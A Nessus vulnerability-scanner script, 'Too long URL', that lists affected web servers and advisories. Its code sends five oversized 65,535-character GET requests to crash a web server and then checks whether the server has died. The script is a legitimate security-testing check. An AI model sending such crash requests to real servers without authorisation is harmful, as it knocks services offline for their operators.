#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
# Some vulnerable servers:
# SmallHTTP (All versions vulnerable: 2.x Stables, 3.x Latest beta 8)
# OmniHTTPd v2.09 of Omnicron (www.omnicron.ca)
# MyWebServer 1.02
# atphttpd-0.4b ?
# IBM Tivoli Management Framework < Currently Fixpack 2 or Patches
#  3.7.1-TMF-0066
#  LCFD process - default port 9495)
# IBM Tivoli Management Framework 3.6.x through 3.7.1 (fixed in 4.1)
#  Spider process - default port 94 redirected to another port.
# Access Point IP Services Router (Formerly known as Xedia Router)
# Oracle9iAS Web Cache/2.0.0.1.0
# TelCondex SimpleWebServer 2.06.20817 Build 3128
# Polycom ViaVideo 2.2 & 3.0
# WebServer 4 Everyone
# savant WebServer 3.1 and previous
#
#
# Also covers CVE-2000-0065, CVE-2000-0002
# 
########################
# References:
########################
# Date: Sat, 12 Oct 2002 07:49:52 +0200
# From:"Marc Ruef" <marc.ruef@computec.ch>
# To:bugtraq@securityfocus.com
# Subject: Long URL crashes My Web Server 1.0.2
#
# Date: Sun, 13 Oct 2002 15:00:18 +0200
# From:"Marc Ruef" <marc.ruef@computec.ch>
# To:bugtraq@securityfocus.com
# Subject: Long URL causes TelCondex SimpleWebServer to crash
#
# Date: Mon, 14 Oct 2002 08:27:54 +1300 (NZDT)
# From:advisory@prophecy.net.nz
# To:bugtraq@securityfocus.com
# Subject: Security vulnerabilities in Polycom ViaVideo Web component
#
# From:"David Endler" <dendler@idefense.com>
# To:bugtraq@securityfocus.com
# Date: Tue, 15 Oct 2002 13:12:35 -0400
# Subject: iDEFENSE Security Advisory 10.15.02: DoS and Directory Traversal Vulnerabilities in WebServer 4 Everyone
#
# Delivered-To: mailing list vulnwatch@vulnwatch.org
# Date: Tue, 10 Sep 2002 15:39:02 -0700
# Message-ID: <9DC8A3D37E31E043BD516142594BDDFA017CA6FC@MISSION.foundstone.com>
# From: "Foundstone Labs" <labs@foundstone.com>
# To: "announce" <announce@foundstone.com>
# Subject: Foundstone Labs Advisory - Buffer Overflow in Savant Web Server
# 
########################
########################

if(description)
{
 script_id(10320);
 script_version ("$Revision: 1.28.2.2 $");
 script_bugtraq_id(2979);
 script_cve_id("CAN-2001-1250");
 
 name["english"] = "Too long URL";
 name["francais"] = "URL trop longue";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It may be possible to make a web server execute
arbitrary code by sending it a too long url. 

Risk factor : High

Solution : Upgrade your web server.";

 desc["francais"] = "
 
Il est peut etre possible de faire executer du code arbitraire
 un serveur web en lui envoyant une URL trop longue.

Facteur de risque : Elev

Solution : Mettez  jour votre serveur web.";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Web server buffer overflow";
 summary["francais"] = "Dpassement de buffer dans un serveur web";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DESTRUCTIVE_ATTACK); 
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
  script_require_ports("Services/www",80);
 exit(0);
}

#
# The script code starts here
#


include("http_func.inc");

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);


if(http_is_dead(port:port))exit(0);

# vWebServer and Small HTTP are vulnerable *if* the URL is requested 
# a couple of times. Ref: VULN-DEV & BUGTRAQ (2001-09-29)
for (i = 0; i < 5; i = i + 1)
{
 soc = http_open_socket(port);
 if(soc)
 {
 req = string("/", crap(65535));
 req = http_get(item:req, port:port);
 send(socket:soc, data:req);
 http_close_socket(soc);
 }
}


if(http_is_dead(port: port))
{
	security_hole(port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
}
